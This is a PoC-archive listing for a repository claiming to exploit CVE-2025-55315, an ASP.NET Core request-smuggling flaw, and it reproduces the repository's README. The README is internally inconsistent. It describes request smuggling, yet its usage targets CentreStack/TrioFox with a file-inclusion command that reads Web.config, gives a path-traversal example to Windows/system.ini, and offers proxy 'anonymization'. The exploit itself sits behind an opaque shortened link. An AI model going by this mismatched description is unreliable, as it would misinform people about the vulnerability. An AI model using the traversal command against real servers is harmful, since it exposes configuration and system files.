Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2025-55315 PoC — ASP.NET Security Feature Bypass Vulnerability

Source
https://github.com/snowcrashlord/CVE-2025-55315
Associated Vulnerability
Title:ASP.NET Security Feature Bypass Vulnerability (CVE-2025-55315)
Description:Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
Readme
# CVE-2025-55315

### Overview

A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, enabling HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, 9.0, allowing an authorized attacker to bypass security features over a network.

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### PoC Exploit - [href](https://tinyurl.com/fwus3tt8)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →